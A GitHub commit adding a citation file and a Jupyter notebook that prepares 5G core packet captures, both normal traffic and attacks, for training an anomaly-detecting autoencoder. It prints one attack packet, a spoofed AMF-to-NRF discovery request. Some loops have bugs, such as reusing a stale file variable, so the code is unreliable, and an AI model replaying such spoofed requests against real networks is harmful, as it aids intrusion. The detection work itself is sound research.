STRLCPY/5GAD

Add files via upload
Matthew Anderson committed with GitHub 2 years ago

46d40475

1 parent 45358aff

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

■ ■ ■ ■ ■ ■

CITATION.cff

1	+	cff-version:1.2.0
2	+	message: "If you use this dataset, please cite it as below."
3	+	authors:
4	+	- family-names: "Coldwell"
5	+	given-names: "Cooper"
6	+	orcid: https://orcid.org/0000-0002-6376-8047
7	+	- family-names: "Conger"
8	+	given-names: "Denver"
9	+	- family-names: "Goodell"
10	+	given-names: "Edward"
11	+	- family-names: "Jacobson"
12	+	given-names: "Brendan"
13	+	- family-names: "Petersen"
14	+	given-names: "Bryton"
15	+	orcid: https://orcid.org/0000-0002-2242-108X
16	+	- family-names: "Spencer"
17	+	given-names: "Damon"
18	+	- family-names: "Anderson"
19	+	given-names: "Matthew"
20	+	- family-names: "Sgambati"
21	+	given-names: "Matthew"
22	+	title: "5GAD-2022"
23	+	version: 1.0.0
24	+	doi:
25	+	date-released:
26	+	url: "https://github.com/idaholab/"
27	+	type: dataset
28	+
29	+
30	+
31	+
32	+
33	+
34	+

■ ■ ■ ■ ■ ■

Data_prep.ipynb

1	+	{
2	+	"cells": [
3	+	{
4	+	"cell_type": "markdown",
5	+	"metadata": {},
6	+	"source": [
7	+	" \n",
8	+	"***\n",
9	+	"***\n",
10	+	"# Written by Cooper Coldwell, June 23 2022\n",
11	+	"This code's purpose is to read in '.pcapng' files from 3 sources--Normal-1UE, Normal-2UE, and Attacks--and parse the data to use for machine learning model training. \n",
12	+	"## Dataset Explanation\n",
13	+	"### Normal-1UE\n",
14	+	"The Normal-1UE sets represent normal 5G network traffic data collected on a simulated 5G Core connected to another computer simulating a Radio-Area-Network connected to a single User Equipment (UE, basically a 5G-capable device like a cellphone). Within the Normal-1UE directory are log files--containing the terminal logs for each Network Function (NF, the components of the 5G network)--and '.pcapng' files containing the captured 5G network packets. \n",
15	+	"The network traffic consisted of YouTube streaming, HTTP requests to popular websites, and data transfers to and from FTP and SAMBA servers.\n",
16	+	"### Normal-2UE\n",
17	+	"The Normal-2UE captured data is very similar to the Normal-1UE data except with two simulated UEs. The network traffic was of the same type but divided between the two UEs. The goal here was to introduce more 'network regulation'-type data that was very weakly represented in the 1UE. Consider the following scenario:\n",
18	+	"> A physical 5G network: a user with a 5G cellphone is moving, so the connection strength between the user and cell tower A weakens while connection strength to tower B is increasing. The network would detect this and make decisions whether to end the user's session with A and begin another with B. \n",
19	+	"\n",
20	+	"With two UEs, we hope to see more of these types of intra-network communication packets.\n",
21	+	"### Attacks\n",
22	+	"The Attacks captured data were captured by executing 5G-specific attacks against the 5G Core from the 5G Core, i.e. a Bad Actor has gained access to the Core and is mucking around. There is very little internet traffic in this set because the attacks were run while the simulated UEs were idle. There might be some incidental traffic, but not much.\n",
23	+	"## Data Handling\n",
24	+	"The data is saved across many files. For the normal data, we are pulling the data from the 'allcap\\*.pcapng' files, which contains the combined data from all the network interfaces we recorded on; the allcap files represent the sum total of all the traffic inside the 5G Core as well as the data between the RAN and Core.\n",
25	+	"When examining the captured packets with Wireshark and Scapy, we discovered that the packet layers containing the attacks were labelled as 'Raw' by Scapy, so we decided to discard the other layers. To convert the packets to a format usable for training ML models, this notebook performs the following:\n",
26	+	"1. Read in the files with Scapy\n",
27	+	"2. Convert the raw bytes for each to a string\n",
28	+	"3. Add each successive packet to an array containing the other packets of the same classification (Normal-1UE, Normal-2UE, Attack)\n",
29	+	"4. Combine subsets of the processed sets together to create a set containing normal data of both varieties and another set that is 50% attack, 50% normal. The packets in the mixed normal-and-attacks set are labelled according to whether they are normal or attack.\n",
30	+	" - These labels are not important for our training, because we use unsupervised learning to train a variational autoencoder on the normal data, but the labelled data is useful for comparing how well the VAE can differentiate between attacks and normal traffic.\n",
31	+	"5. Shuffle each set, then normalize the length of each string of bytes\n",
32	+	"6. Convert the strings of bytes to an array of bytes\n",
33	+	"7. Save the datasets"
34	+	]
35	+	},
36	+	{
37	+	"cell_type": "code",
38	+	"execution_count": null,
39	+	"metadata": {},
40	+	"outputs": [],
41	+	"source": [
42	+	"from __future__ import absolute_import, division, print_function, unicode_literals\n",
43	+	"\n",
44	+	"# import cupy as cp\n",
45	+	"import numpy as np\n",
46	+	"import pandas as pd\n",
47	+	"# import cudf as cd\n",
48	+	"\n",
49	+	"import os, sys\n",
50	+	"import glob as glob\n",
51	+	"import binascii\n",
52	+	"import csv\n",
53	+	"import pickle\n",
54	+	"from scapy.all import *\n",
55	+	"from pathlib import Path\n",
56	+	"from tqdm.auto import tqdm"
57	+	]
58	+	},
59	+	{
60	+	"cell_type": "markdown",
61	+	"metadata": {},
62	+	"source": [
63	+	"### Set directory paths pointing towards the datasets\n",
64	+	"The processedPath variable points to where the output files will be written. The path\\* variables point to the data sources."
65	+	]
66	+	},
67	+	{
68	+	"cell_type": "code",
69	+	"execution_count": 2,
70	+	"metadata": {},
71	+	"outputs": [],
72	+	"source": [
73	+	"pathToNormal = 'Normal-1UE/'\n",
74	+	"pathToNormal2UE = 'Normal-2UE/'\n",
75	+	"pathToAttack = 'Attacks/'\n",
76	+	"!mkdir NEW-PREPPED-DATA_jupyter\n",
77	+	"processedPath = 'NEW-PREPPED-DATA/'"
78	+	]
79	+	},
80	+	{
81	+	"cell_type": "markdown",
82	+	"metadata": {},
83	+	"source": [
84	+	"# Loading data from the .pcapng files"
85	+	]
86	+	},
87	+	{
88	+	"cell_type": "markdown",
89	+	"metadata": {
90	+	"tags": []
91	+	},
92	+	"source": [
93	+	"## Let's first look at the structure of packets:"
94	+	]
95	+	},
96	+	{
97	+	"cell_type": "code",
98	+	"execution_count": 3,
99	+	"metadata": {},
100	+	"outputs": [],
101	+	"source": [
102	+	"example = rdpcap(pathToAttack+'AMFLookingForUDM/allcap_AMFLookingForUDM_00001_20220609151247.pcapng')"
103	+	]
104	+	},
105	+	{
106	+	"cell_type": "code",
107	+	"execution_count": 4,
108	+	"metadata": {},
109	+	"outputs": [
110	+	{
111	+	"name": "stdout",
112	+	"output_type": "stream",
113	+	"text": [
114	+	"###[ Ethernet ]### \n",
115	+	" dst = 00:00:00:00:00:00\n",
116	+	" src = 00:00:00:00:00:00\n",
117	+	" type = IPv4\n",
118	+	"###[ IP ]### \n",
119	+	" version = 4\n",
120	+	" ihl = 5\n",
121	+	" tos = 0x0\n",
122	+	" len = 197\n",
123	+	" id = 22163\n",
124	+	" flags = DF\n",
125	+	" frag = 0\n",
126	+	" ttl = 64\n",
127	+	" proto = tcp\n",
128	+	" chksum = 0xe594\n",
129	+	" src = 127.0.0.1\n",
130	+	" dst = 127.0.0.10\n",
131	+	" \\options \\\n",
132	+	"###[ TCP ]### \n",
133	+	" sport = 37364\n",
134	+	" dport = irdmi\n",
135	+	" seq = 3683835274\n",
136	+	" ack = 4293697932\n",
137	+	" dataofs = 8\n",
138	+	" reserved = 0\n",
139	+	" flags = PA\n",
140	+	" window = 512\n",
141	+	" chksum = 0xfec2\n",
142	+	" urgptr = 0\n",
143	+	" options = [('NOP', None), ('NOP', None), ('Timestamp', (3708803956, 3529532140))]\n",
144	+	"###[ Raw ]### \n",
145	+	" load = 'GET /nnrf-disc/v1/nf-instances?requester-nf-type=AMF&target-nf-type=UDM HTTP/1.1\\r\\nHost: 127.0.0.10:8000\\r\\nUser-Agent: curl/7.68.0\\r\\nAccept: /\\r\\n\\r\\n'\n",
146	+	"\n"
147	+	]
148	+	}
149	+	],
150	+	"source": [
151	+	"example[6].show()"
152	+	]
153	+	},
154	+	{
155	+	"cell_type": "markdown",
156	+	"metadata": {},
157	+	"source": [
158	+	"What ScaPy shows as 'Raw' for this packet is everything after the IP and TCP headers, which turns out to be HTTP. \n",
159	+	"\n",
160	+	"This specific packet is an attack packet that pretends to be the AMF network function asking for information about the UDM network function. The attack itself is contained in the HTTP data. All of our attacks occur in HTTP or PFCP data; luckily for us, Scapy labels those portions as 'Raw'. The IP and TCP headers aren't part of the attack, but they might tip off the model based on commonalities between the attacks, so we will strip off those layers and only keep the 'Raw' portion."
161	+	]
162	+	},
163	+	{
164	+	"cell_type": "markdown",
165	+	"metadata": {},
166	+	"source": [
167	+	"## Open the Normal-1UE data and append it all together"
168	+	]
169	+	},
170	+	{
171	+	"cell_type": "markdown",
172	+	"metadata": {},
173	+	"source": [
174	+	"### Close any running tqdm instances\n",
175	+	"The `tqdm` library provides a handy progress bar. The below section of code is only useful if you're rerunning cells in Jupyter because Jupyter maintains variables in memory, so rerunning a cell can open new instances of `tqdm`, causing the progress bar to not update in-line."
176	+	]
177	+	},
178	+	{
179	+	"cell_type": "code",
180	+	"execution_count": 5,
181	+	"metadata": {},
182	+	"outputs": [
183	+	{
184	+	"name": "stdout",
185	+	"output_type": "stream",
186	+	"text": [
187	+	"Made it past clearing instances\n"
188	+	]
189	+	}
190	+	],
191	+	"source": [
192	+	"while len(tqdm._instances) > 0:\n",
193	+	" tqdm._instances.pop().close()\n",
194	+	"print(\"Made it past clearing instances\")"
195	+	]
196	+	},
197	+	{
198	+	"cell_type": "markdown",
199	+	"metadata": {},
200	+	"source": [
201	+	"The Normal-1UE data is spread across several 'allcap*' files, so we need to iterate through the files, process them with Scapy, and combine the data into one array.\n",
202	+	"- we gather a list of .pcapng files (in the Normal-1UE directory) starting with 'allcap' using the `glob` function\n",
203	+	"- the `sniff` function is a Scapy method for reading capture files. Another possible method to use is `rdpcap`, but I found sniff to be faster for large sets.\n",
204	+	"- The Raw data output by Scapy is ugly, and not especially useful in its initial form. It will look like individual bytes represented in hexadecimal and separated by '\\'\n",
205	+	" - To remedy this, we use `binascii.hexlify`, which converts converts each byte of the binary output of sniff() to its 2-digit hex representation, which is output as a string.\n",
206	+	" \n",
207	+	"NOTE: Reading in these pcapng files is not a quick process, so expect this section to take 10+ minutes with a decently fast CPU"
208	+	]
209	+	},
210	+	{
211	+	"cell_type": "code",
212	+	"execution_count": 6,
213	+	"metadata": {},
214	+	"outputs": [
215	+	{
216	+	"name": "stdout",
217	+	"output_type": "stream",
218	+	"text": [
219	+	"['Normal-1UE/allcap_00006_20220607091008.pcapng', 'Normal-1UE/allcap_00003_20220606211007.pcapng', 'Normal-1UE/allcap_00001_20220606131007.pcapng', 'Normal-1UE/allcap_00002_20220606171007.pcapng', 'Normal-1UE/allcap_00005_20220607051008.pcapng', 'Normal-1UE/allcap_00001_20220606102554.pcapng', 'Normal-1UE/allcap_00004_20220607011007.pcapng']\n"
220	+	]
221	+	},
222	+	{
223	+	"data": {
224	+	"application/vnd.jupyter.widget-view+json": {
225	+	"model_id": "9b42ff90fb78456aa8f088f14565e2f8",
226	+	"version_major": 2,
227	+	"version_minor": 0
228	+	},
229	+	"text/plain": [
230	+	" 0%\| \| 0/7 [00:00<?, ?it/s]"
231	+	]
232	+	},
233	+	"metadata": {},
234	+	"output_type": "display_data"
235	+	},
236	+	{
237	+	"name": "stdout",
238	+	"output_type": "stream",
239	+	"text": [
240	+	"9339618\n"
241	+	]
242	+	}
243	+	],
244	+	"source": [
245	+	"datasets = glob(pathToNormal+'allcap*.pcapng')\n",
246	+	"print(datasets)\n",
247	+	"payloads = []\n",
248	+	"for file in tqdm(datasets):\n",
249	+	" pcap = sniff(offline=str(file))\n",
250	+	" for packet in pcap:\n",
251	+	" if not Raw in packet:\n",
252	+	" continue\n",
253	+	" payload = binascii.hexlify(packet[Raw].original)\n",
254	+	" payloads.append(payload)\n",
255	+	"print(len(payloads))"
256	+	]
257	+	},
258	+	{
259	+	"cell_type": "markdown",
260	+	"metadata": {},
261	+	"source": [
262	+	"### Add labels to the data and save it as a CSV\n",
263	+	"We take the payloads pulled from the pcap files and put them into a `pandas` DataFrame. The DataFrame is convenient for both shuffling the data (done with `.sample(frac=1)`) and writing it to a CSV. Before we write the payloads to a CSV, we add a \"label\" column filled with 'normal' to simplify creating a mixed set later. The CSV makes the payloads human-readable in a way that a pickled or numpy-saved file would not be. "
264	+	]
265	+	},
266	+	{
267	+	"cell_type": "code",
268	+	"execution_count": 7,
269	+	"metadata": {},
270	+	"outputs": [
271	+	{
272	+	"name": "stdout",
273	+	"output_type": "stream",
274	+	"text": [
275	+	" raw label\n",
276	+	"0 b'5497e16da1b9130133e5e732e67c0047910ac5fcee6b... normal\n",
277	+	"1 b'5445177f2e2747f98c8e1bbf79528d030a242a515814... normal\n",
278	+	"2 b'4eccbad439a0903d62084b152dc51a3e9c21bdc05ef5... normal\n",
279	+	"3 b'34ff00c0000000010000008501000900456000b80000... normal\n",
280	+	"4 b'0a061f1bbb205a0a14a33dc41faa033103ab6cf44fc6... normal\n"
281	+	]
282	+	}
283	+	],
284	+	"source": [
285	+	"data = {'raw':payloads}\n",
286	+	"df = pd.DataFrame(data=data).sample(frac=1).reset_index(drop=True)\n",
287	+	"df.loc[:,'label'] = 'normal'\n",
288	+	"df.to_csv(f\"{processedPath}normal_data.csv\", index=False)\n",
289	+	"print(df.head(5))"
290	+	]
291	+	},
292	+	{
293	+	"cell_type": "markdown",
294	+	"metadata": {},
295	+	"source": [
296	+	"## Open the 2UE normal data and append it together\n",
297	+	"The process used to handle the Normal-1UE data applies here as well, with a notable exception: speed. \n",
298	+	"Reading in the 2UE files is MUCH slower than the 1UE files because 2UE has 23M packets vs. 1UE's 9M."
299	+	]
300	+	},
301	+	{
302	+	"cell_type": "code",
303	+	"execution_count": 8,
304	+	"metadata": {},
305	+	"outputs": [
306	+	{
307	+	"name": "stdout",
308	+	"output_type": "stream",
309	+	"text": [
310	+	"Made it past clearing instances\n",
311	+	"24851445\n"
312	+	]
313	+	}
314	+	],
315	+	"source": [
316	+	"# Close tqdm instances:\n",
317	+	"while len(tqdm._instances) > 0:\n",
318	+	" tqdm._instances.pop().close()\n",
319	+	"print(\"Made it past clearing instances\")\n",
320	+	"\n",
321	+	"datasets = glob(pathToNormal2UE+'allcap*.pcapng')\n",
322	+	"payloads = []\n",
323	+	"for pcap in datasets:\n",
324	+	" pcap = sniff(offline=str(file))\n",
325	+	" for packet in pcap:\n",
326	+	" if not Raw in packet:\n",
327	+	" continue\n",
328	+	" payload = binascii.hexlify(packet[Raw].original)\n",
329	+	" payloads.append(payload)\n",
330	+	"print(len(payloads))"
331	+	]
332	+	},
333	+	{
334	+	"cell_type": "markdown",
335	+	"metadata": {},
336	+	"source": [
337	+	"The 2UE data is *massive, so it's important to save at this point to avoid accidental loss. We experienced memory overloads, which crashed the program while trying to save to either a .npy or CSV (though, when the crashes occured, we were running the notebook cells out of order. YMMV). I discovered that saving as a pickle file used up less memory and helped to avoid crashes. You don't want to crash before saving and have to rerun the 2 hour processing time.*"
338	+	]
339	+	},
340	+	{
341	+	"cell_type": "code",
342	+	"execution_count": 9,
343	+	"metadata": {},
344	+	"outputs": [],
345	+	"source": [
346	+	"with open('2ue.p','wb') as file:\n",
347	+	" pickle.dump(payloads,file)"
348	+	]
349	+	},
350	+	{
351	+	"cell_type": "code",
352	+	"execution_count": 10,
353	+	"metadata": {},
354	+	"outputs": [],
355	+	"source": [
356	+	"with open('2ue.p','rb') as file:\n",
357	+	" payloads = pickle.load(file)"
358	+	]
359	+	},
360	+	{
361	+	"cell_type": "code",
362	+	"execution_count": 11,
363	+	"metadata": {},
364	+	"outputs": [],
365	+	"source": [
366	+	"data = {'raw':payloads,'label':['normal']*len(payloads)}\n",
367	+	"# print(data['label'][0])\n",
368	+	"df = pd.DataFrame(data=data).sample(frac=1).reset_index(drop=True)\n",
369	+	"df.to_csv(f\"{processedPath}normal_data_2ue.csv\", index=False)"
370	+	]
371	+	},
372	+	{
373	+	"cell_type": "markdown",
374	+	"metadata": {
375	+	"tags": []
376	+	},
377	+	"source": [
378	+	"## Open the malicious data and append it all together\n",
379	+	"The total data collected while running the attacks is much smaller than the collected normal datas. The size of the isolated attack data is even smaller because we used Wireshark to filter out and export the packets performing the attacks. The filtered pcap files are labelled beginning with \"Attacks_\". \n",
380	+	"Also of note is that each attack is within its own subdirectory of the Attacks directory. The folders are named for the attack type, and each pcap file is also named for the attack type."
381	+	]
382	+	},
383	+	{
384	+	"cell_type": "markdown",
385	+	"metadata": {},
386	+	"source": [
387	+	"<!-- one packet attack, contents of packet trigger attack\n",
388	+	"run multiple times in capture\n",
389	+	"rest of packet is normal traffic -->"
390	+	]
391	+	},
392	+	{
393	+	"cell_type": "code",
394	+	"execution_count": 3,
395	+	"metadata": {},
396	+	"outputs": [
397	+	{
398	+	"name": "stdout",
399	+	"output_type": "stream",
400	+	"text": [
401	+	"Failed to find 'Attacks*.pcapng' file in folder: Attacks/.ipynb_checkpoints\n",
402	+	"24174\n"
403	+	]
404	+	}
405	+	],
406	+	"source": [
407	+	"## Remove previously-used variables from memory if they exist. This helps to reduce memory usage, and perhaps equally as important, prevent variables remaining in memory from causing unintended behavior.\n",
408	+	"## This step isn't important if the notebook is run sequentially, but in our workflow, we would re-run certain sections as needed.\n",
409	+	"try:\n",
410	+	" del dataset, payload, payloads, data, df\n",
411	+	"except:\n",
412	+	" pass\n",
413	+	"\n",
414	+	"sets = []\n",
415	+	"# print(os.listdir(pathToAttack))\n",
416	+	"for i in os.listdir(pathToAttack):\n",
417	+	" dataset = glob(pathToAttack+i+'/Attacks*.pcapng')\n",
418	+	" try:\n",
419	+	" # print(dataset[0])\n",
420	+	" sets.append(str(dataset[0]))\n",
421	+	" except:\n",
422	+	" print(\"Failed to find 'Attacks*.pcapng' file in folder: \", str(pathToAttack+i))\n",
423	+	" \n",
424	+	"# print(sets)\n",
425	+	"payloads = []\n",
426	+	"for file in sets:\n",
427	+	" pcap = sniff(offline=str(file))\n",
428	+	" \n",
429	+	" for packet in pcap[Raw]:\n",
430	+	" if not Raw in packet:\n",
431	+	" continue\n",
432	+	" payload = binascii.hexlify(packet[Raw].original)\n",
433	+	" payloads.append(payload)\n",
434	+	" # print(file,len(payloads)\n",
435	+	"print(len(payloads))"
436	+	]
437	+	},
438	+	{
439	+	"cell_type": "code",
440	+	"execution_count": 4,
441	+	"metadata": {},
442	+	"outputs": [],
443	+	"source": [
444	+	"data = {'raw':payloads}\n",
445	+	"df = pd.DataFrame(data=data)\n",
446	+	"df.loc[:,'label'] = 'attack'\n",
447	+	"df.to_csv(f\"{processedPath}malicious_data.csv\", index=False)\n",
448	+	"\n",
449	+	"try:\n",
450	+	" del dataset, payload, payloads, data, df\n",
451	+	"except:\n",
452	+	" pass"
453	+	]
454	+	},
455	+	{
456	+	"cell_type": "markdown",
457	+	"metadata": {},
458	+	"source": [
459	+	"## Import the data from the CSVs\n",
460	+	"Using cuDF and cuPy should increase the processing speed (by orders of magnitude) over using pandas and numpy because these new libraries use Nvidia CUDA cores for the processing. The documentation says cuDF and cuPy should implement most methods from pandas and numpy, but I had difficulty using the CUDA accelerated libraries by importing them under the same alias as pandas and numpy. \n",
461	+	"\n",
462	+	"The issue I encounter was cuDF and cuPY expecting very specific data-types as function parameters, which I unsuccessfully tried to provide. You, the reader, may be able to figure it out if it piques your interest.\n",
463	+	"\n",
464	+	"Back to pandas and numpy... \n",
465	+	"### Importing CSVs..."
466	+	]
467	+	},
468	+	{
469	+	"cell_type": "code",
470	+	"execution_count": 5,
471	+	"metadata": {},
472	+	"outputs": [],
473	+	"source": [
474	+	"# import cudf as pd\n",
475	+	"# import cupy as np"
476	+	]
477	+	},
478	+	{
479	+	"cell_type": "code",
480	+	"execution_count": 6,
481	+	"metadata": {},
482	+	"outputs": [],
483	+	"source": [
484	+	"normal = pd.read_csv(f\"{processedPath}normal_data.csv\")\n",
485	+	"normal2UE = pd.read_csv(f\"{processedPath}normal_data_2ue.csv\")\n",
486	+	"malicious = pd.read_csv(f\"{processedPath}malicious_data.csv\")"
487	+	]
488	+	},
489	+	{
490	+	"cell_type": "code",
491	+	"execution_count": 7,
492	+	"metadata": {},
493	+	"outputs": [
494	+	{
495	+	"name": "stdout",
496	+	"output_type": "stream",
497	+	"text": [
498	+	"Normal: \n"
499	+	]
500	+	},
501	+	{
502	+	"data": {
503	+	"text/html": [
504	+	"<div>\n",
505	+	"<style scoped>\n",
506	+	" .dataframe tbody tr th:only-of-type {\n",
507	+	" vertical-align: middle;\n",
508	+	" }\n",
509	+	"\n",
510	+	" .dataframe tbody tr th {\n",
511	+	" vertical-align: top;\n",
512	+	" }\n",
513	+	"\n",
514	+	" .dataframe thead th {\n",
515	+	" text-align: right;\n",
516	+	" }\n",
517	+	"</style>\n",
518	+	"<table border=\"1\" class=\"dataframe\">\n",
519	+	" <thead>\n",
520	+	" <tr style=\"text-align: right;\">\n",
521	+	" <th></th>\n",
522	+	" <th>raw</th>\n",
523	+	" <th>label</th>\n",
524	+	" </tr>\n",
525	+	" </thead>\n",
526	+	" <tbody>\n",
527	+	" <tr>\n",
528	+	" <th>0</th>\n",
529	+	" <td>b'5497e16da1b9130133e5e732e67c0047910ac5fcee6b...</td>\n",
530	+	" <td>normal</td>\n",
531	+	" </tr>\n",
532	+	" <tr>\n",
533	+	" <th>1</th>\n",
534	+	" <td>b'5445177f2e2747f98c8e1bbf79528d030a242a515814...</td>\n",
535	+	" <td>normal</td>\n",
536	+	" </tr>\n",
537	+	" <tr>\n",
538	+	" <th>2</th>\n",
539	+	" <td>b'4eccbad439a0903d62084b152dc51a3e9c21bdc05ef5...</td>\n",
540	+	" <td>normal</td>\n",
541	+	" </tr>\n",
542	+	" <tr>\n",
543	+	" <th>3</th>\n",
544	+	" <td>b'34ff00c0000000010000008501000900456000b80000...</td>\n",
545	+	" <td>normal</td>\n",
546	+	" </tr>\n",
547	+	" </tbody>\n",
548	+	"</table>\n",
549	+	"</div>"
550	+	],
551	+	"text/plain": [
552	+	" raw label\n",
553	+	"0 b'5497e16da1b9130133e5e732e67c0047910ac5fcee6b... normal\n",
554	+	"1 b'5445177f2e2747f98c8e1bbf79528d030a242a515814... normal\n",
555	+	"2 b'4eccbad439a0903d62084b152dc51a3e9c21bdc05ef5... normal\n",
556	+	"3 b'34ff00c0000000010000008501000900456000b80000... normal"
557	+	]
558	+	},
559	+	"execution_count": 7,
560	+	"metadata": {},
561	+	"output_type": "execute_result"
562	+	}
563	+	],
564	+	"source": [
565	+	"print('Normal: ')\n",
566	+	"normal.head(4)"
567	+	]
568	+	},
569	+	{
570	+	"cell_type": "code",
571	+	"execution_count": 8,
572	+	"metadata": {},
573	+	"outputs": [
574	+	{
575	+	"name": "stdout",
576	+	"output_type": "stream",
577	+	"text": [
578	+	"Normal-2UE: \n"
579	+	]
580	+	},
581	+	{
582	+	"data": {
583	+	"text/html": [
584	+	"<div>\n",
585	+	"<style scoped>\n",
586	+	" .dataframe tbody tr th:only-of-type {\n",
587	+	" vertical-align: middle;\n",
588	+	" }\n",
589	+	"\n",
590	+	" .dataframe tbody tr th {\n",
591	+	" vertical-align: top;\n",
592	+	" }\n",
593	+	"\n",
594	+	" .dataframe thead th {\n",
595	+	" text-align: right;\n",
596	+	" }\n",
597	+	"</style>\n",
598	+	"<table border=\"1\" class=\"dataframe\">\n",
599	+	" <thead>\n",
600	+	" <tr style=\"text-align: right;\">\n",
601	+	" <th></th>\n",
602	+	" <th>raw</th>\n",
603	+	" <th>label</th>\n",
604	+	" </tr>\n",
605	+	" </thead>\n",
606	+	" <tbody>\n",
607	+	" <tr>\n",
608	+	" <th>0</th>\n",
609	+	" <td>b'34ff027d000000010000008501100900450002750000...</td>\n",
610	+	" <td>normal</td>\n",
611	+	" </tr>\n",
612	+	" <tr>\n",
613	+	" <th>1</th>\n",
614	+	" <td>b'591d7435daee582a77fab1fbf19331c573956854543c...</td>\n",
615	+	" <td>normal</td>\n",
616	+	" </tr>\n",
617	+	" <tr>\n",
618	+	" <th>2</th>\n",
619	+	" <td>b'34ff00440000000100000085010009004580003c50dc...</td>\n",
620	+	" <td>normal</td>\n",
621	+	" </tr>\n",
622	+	" <tr>\n",
623	+	" <th>3</th>\n",
624	+	" <td>b'34ff009100000001000000850110090045000089125e...</td>\n",
625	+	" <td>normal</td>\n",
626	+	" </tr>\n",
627	+	" <tr>\n",
628	+	" <th>4</th>\n",
629	+	" <td>b'34ff0030000000010000008501100900452000280000...</td>\n",
630	+	" <td>normal</td>\n",
631	+	" </tr>\n",
632	+	" </tbody>\n",
633	+	"</table>\n",
634	+	"</div>"
635	+	],
636	+	"text/plain": [
637	+	" raw label\n",
638	+	"0 b'34ff027d000000010000008501100900450002750000... normal\n",
639	+	"1 b'591d7435daee582a77fab1fbf19331c573956854543c... normal\n",
640	+	"2 b'34ff00440000000100000085010009004580003c50dc... normal\n",
641	+	"3 b'34ff009100000001000000850110090045000089125e... normal\n",
642	+	"4 b'34ff0030000000010000008501100900452000280000... normal"
643	+	]
644	+	},
645	+	"execution_count": 8,
646	+	"metadata": {},
647	+	"output_type": "execute_result"
648	+	}
649	+	],
650	+	"source": [
651	+	"print('Normal-2UE: ')\n",
652	+	"normal2UE.head()"
653	+	]
654	+	},
655	+	{
656	+	"cell_type": "code",
657	+	"execution_count": 9,
658	+	"metadata": {},
659	+	"outputs": [
660	+	{
661	+	"name": "stdout",
662	+	"output_type": "stream",
663	+	"text": [
664	+	"Malicious: \n"
665	+	]
666	+	},
667	+	{
668	+	"data": {
669	+	"text/html": [
670	+	"<div>\n",
671	+	"<style scoped>\n",
672	+	" .dataframe tbody tr th:only-of-type {\n",
673	+	" vertical-align: middle;\n",
674	+	" }\n",
675	+	"\n",
676	+	" .dataframe tbody tr th {\n",
677	+	" vertical-align: top;\n",
678	+	" }\n",
679	+	"\n",
680	+	" .dataframe thead th {\n",
681	+	" text-align: right;\n",
682	+	" }\n",
683	+	"</style>\n",
684	+	"<table border=\"1\" class=\"dataframe\">\n",
685	+	" <thead>\n",
686	+	" <tr style=\"text-align: right;\">\n",
687	+	" <th></th>\n",
688	+	" <th>raw</th>\n",
689	+	" <th>label</th>\n",
690	+	" </tr>\n",
691	+	" </thead>\n",
692	+	" <tbody>\n",
693	+	" <tr>\n",
694	+	" <th>0</th>\n",
695	+	" <td>b'474554202f6e6e72662d646973632f76312f6e662d69...</td>\n",
696	+	" <td>attack</td>\n",
697	+	" </tr>\n",
698	+	" <tr>\n",
699	+	" <th>1</th>\n",
700	+	" <td>b'474554202f6e6e72662d646973632f76312f6e662d69...</td>\n",
701	+	" <td>attack</td>\n",
702	+	" </tr>\n",
703	+	" <tr>\n",
704	+	" <th>2</th>\n",
705	+	" <td>b'474554202f6e6e72662d646973632f76312f6e662d69...</td>\n",
706	+	" <td>attack</td>\n",
707	+	" </tr>\n",
708	+	" <tr>\n",
709	+	" <th>3</th>\n",
710	+	" <td>b'474554202f6e6e72662d646973632f76312f6e662d69...</td>\n",
711	+	" <td>attack</td>\n",
712	+	" </tr>\n",
713	+	" </tbody>\n",
714	+	"</table>\n",
715	+	"</div>"
716	+	],
717	+	"text/plain": [
718	+	" raw label\n",
719	+	"0 b'474554202f6e6e72662d646973632f76312f6e662d69... attack\n",
720	+	"1 b'474554202f6e6e72662d646973632f76312f6e662d69... attack\n",
721	+	"2 b'474554202f6e6e72662d646973632f76312f6e662d69... attack\n",
722	+	"3 b'474554202f6e6e72662d646973632f76312f6e662d69... attack"
723	+	]
724	+	},
725	+	"execution_count": 9,
726	+	"metadata": {},
727	+	"output_type": "execute_result"
728	+	}
729	+	],
730	+	"source": [
731	+	"print('Malicious: ')\n",
732	+	"malicious.head(4)"
733	+	]
734	+	},
735	+	{
736	+	"cell_type": "markdown",
737	+	"metadata": {},
738	+	"source": [
739	+	"## Create new sets from the old for training models\n",
740	+	"We want to have a set that is 50% attacks, 50% normal and a set of the two types of normal traffic. Let's look at the size of the sets so we can determine how best to make the 25-25-50 (1UE-2UE-Attack) dataset."
741	+	]
742	+	},
743	+	{
744	+	"cell_type": "code",
745	+	"execution_count": 10,
746	+	"metadata": {},
747	+	"outputs": [
748	+	{
749	+	"name": "stdout",
750	+	"output_type": "stream",
751	+	"text": [
752	+	"Normal size: (9339618, 2)\n",
753	+	"Normal2UE size: (24851445, 2)\n",
754	+	"Malicious size: (24174, 2)\n"
755	+	]
756	+	}
757	+	],
758	+	"source": [
759	+	"print(f'Normal size: {normal.shape}')\n",
760	+	"print(f'Normal2UE size: {normal2UE.shape}')\n",
761	+	"print(f'Malicious size: {malicious.shape}')"
762	+	]
763	+	},
764	+	{
765	+	"cell_type": "markdown",
766	+	"metadata": {},
767	+	"source": [
768	+	"### Create a mixed set of both attack and normal\n",
769	+	"We want a 50/50 split of normal/attack data, and the malicious set is significantly smaller than either of the normal sets. Therefore, we take all of malicious and then half as many samples each for Normal-1IU and normal2UE. To avoid some kind of data bias, normal and normal2UE are shuffled before sampling.\n",
770	+	"\n",
771	+	"Also, delete variables from memory as we go to avoid crashes."
772	+	]
773	+	},
774	+	{
775	+	"cell_type": "code",
776	+	"execution_count": 11,
777	+	"metadata": {},
778	+	"outputs": [
779	+	{
780	+	"name": "stdout",
781	+	"output_type": "stream",
782	+	"text": [
783	+	"Packets in malicious: 24174\n",
784	+	"Packets in mixed: 48349\n",
785	+	"Mixed set is of the expected size: False\n"
786	+	]
787	+	}
788	+	],
789	+	"source": [
790	+	"mixed = malicious.sample(frac=1,random_state=100) #take all the malicious\n",
791	+	"mixed = pd.concat([mixed, normal.sample(frac=1,random_state=100)[0:len(malicious)//2]]) #append the first {half the length of malicious} packets from normal-1ue\n",
792	+	"mixed = pd.concat([mixed, normal2UE.sample(frac=1,random_state=100)[0:len(malicious)//2]]) #append the first {half the length of malicious} packets from normal-2ue\n",
793	+	"mixed = mixed.sample(frac=1,random_state=1) #shuffle the data before processing\n",
794	+	"## Separate the labels (important for using the mixed data to evaluate an autoencoder)\n",
795	+	"mixed_labels = mixed.pop('label')\n",
796	+	"np.save(f'{processedPath}mixed_labels.npy',mixed_labels)\n",
